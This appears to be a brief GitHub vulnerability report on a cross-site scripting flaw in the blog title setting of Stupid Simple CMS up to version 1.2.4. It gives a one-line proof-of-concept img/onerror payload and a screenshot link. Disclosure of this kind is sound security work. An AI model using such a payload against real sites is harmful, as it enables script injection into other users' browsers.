cms/2.md at main · kilooooo/cms · GitHub

product： Stupid Simple CMS ( Blogger )

download link： https://github.com/codelyfe/Stupid-Simple-CMS

version：<=1.2.4

There is Cross-Site Scripting (XSS) vulnerability within the blog title of the settings.

poc:

 "><img src=1 onerror=alert(1)> 

successed

![2](https://github.com/kilooooo/cms/assets/52652352/bec69f2a-b9b6-4603-acbd-2bb84e862871)